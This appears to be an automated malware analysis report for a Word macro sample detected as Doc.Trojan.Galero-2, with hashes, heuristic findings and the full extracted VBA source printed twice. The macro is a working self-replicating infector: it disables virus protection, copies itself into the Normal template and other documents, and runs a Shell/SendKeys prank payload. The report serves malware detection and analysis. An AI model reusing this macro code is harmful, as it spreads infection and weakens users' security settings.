Doc.Trojan.Galero-2 Office (OLE) malware analysis — malicious · 5f1fe3381808f1cc

MALICIOUS

Office (OLE)

42.5 KB Created: 2001-01-14 00:39:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 369e3f267afe083a446a0f4cde9d6f0a SHA-1: 137eb66596b817f3ddd834a8a9725efee157e96e SHA-256: 5f1fe3381808f1cc5cda192d1a573f9a0b51678bb0cdfe48ddec477e832ec559

320 Risk Score

Malware Insights

Doc.Trojan.Galero-2 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, including an AutoOpen macro that utilizes the OrganizerCopy function to copy a macro named 'payasada' between the current document and the Normal template. This indicates an attempt to establish persistence or spread the malicious macro. The presence of a Shell() call and the ClamAV detection as 'Doc.Trojan.Galero-2' strongly suggest malicious intent.

Heuristics 8

ClamAV: Doc.Trojan.Galero-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Galero-2
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 43,520 bytes but its declared streams total only 21,442 bytes — 22,078 bytes (51%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2445 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2445 bytes
SHA-256: `803649a2d3e57f16a71c459f8626a503d668717073976fb478a4e45ffee79915`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "payasada" Sub AutoOpen() ' ' AutoOpen Macro ' Payasada!!! On Error GoTo payasada Application.ScreenUpdating = False Application.DisplayAlerts = wdAlertsNone WordBasic.DisableAutoMacros 0 Options.VirusProtection = False 'Set ActiveDoc = ActiveDocument 'Set GlobalDoc = NormalTemplate If Not DocInfectado() Then Docinf End If If Not NormalInfectado() Then Norinf End If Call Trues payasada: End Sub Private Sub Docinf() On Error GoTo InfecDocError Application.OrganizerCopy Source:=NormalTemplate.FullName, _ Destination:=ActiveDocument.FullName, Name:="payasada", _ Object:=wdOrganizerObjectProjectItems InfecDocError: End Sub Private Sub Norinf() On Error GoTo InfecDocError Application.OrganizerCopy Source:=ActiveDocument.FullName, _ Destination:=NormalTemplate.FullName, Name:="payasada", _ Object:=wdOrganizerObjectProjectItems Options.SaveNormalPrompt = True InfecDocError: End Sub Public Function DocInfectado() On Error GoTo DocInfectError For i = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(i).Name = "payasada" Then DocInfectado = True End If Next DocInfectError: End Function Public Function NormalInfectado() On Error GoTo NormalInfectError For J = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(J).Name = "payasada" Then NormalInfectado = True End If Next NormalInfectError: End Function Sub Trues() If Second(Now) = Minute(Now) Then Call Payasadas End Sub Sub Payasadas() On Error Resume Next Options.BlueScreen = True MyApp = Shell("Winrep.exe", 1) SendKeys "Hola, creo que me han infectado de nuevo. YA ME TIENEN HARTO!!! ATT, El sistema", True End Sub Sub AutoClose() On Error Resume Next Call Trues End Sub Sub ToolsOptions() On Error Resume Next Options.VirusProtection = 1 Options.SaveNormalPrompt = 1 Dialogs(wdDialogToolsOptions).Show Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 End Sub

SHA-256: 803649a2d3e57f16a71c459f8626a503d668717073976fb478a4e45ffee79915

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "payasada"
Sub AutoOpen()
'
' AutoOpen Macro
' Payasada!!!


On Error GoTo payasada

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False

    'Set ActiveDoc = ActiveDocument
    'Set GlobalDoc = NormalTemplate


If Not DocInfectado() Then
    Docinf
End If

If Not NormalInfectado() Then
    Norinf
End If

Call Trues

payasada:
End Sub
Private Sub Docinf()
On Error GoTo InfecDocError
    
    Application.OrganizerCopy Source:=NormalTemplate.FullName, _
    Destination:=ActiveDocument.FullName, Name:="payasada", _
    Object:=wdOrganizerObjectProjectItems

InfecDocError:
End Sub
Private Sub Norinf()
On Error GoTo InfecDocError

    Application.OrganizerCopy Source:=ActiveDocument.FullName, _
    Destination:=NormalTemplate.FullName, Name:="payasada", _
    Object:=wdOrganizerObjectProjectItems
    Options.SaveNormalPrompt = True

InfecDocError:
End Sub
Public Function DocInfectado()
On Error GoTo DocInfectError
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "payasada" Then
            DocInfectado = True
        End If
Next

DocInfectError:
End Function

Public Function NormalInfectado()

On Error GoTo NormalInfectError
For J = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "payasada" Then
            NormalInfectado = True
        End If
Next


NormalInfectError:
End Function

Sub Trues()
If Second(Now) = Minute(Now) Then Call Payasadas
    

End Sub

Sub Payasadas()
On Error Resume Next
Options.BlueScreen = True
MyApp = Shell("Winrep.exe", 1)
SendKeys "Hola, creo que me han infectado de nuevo.  YA ME TIENEN HARTO!!!    ATT, El sistema", True


End Sub


Sub AutoClose()
On Error Resume Next
Call Trues

End Sub



Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.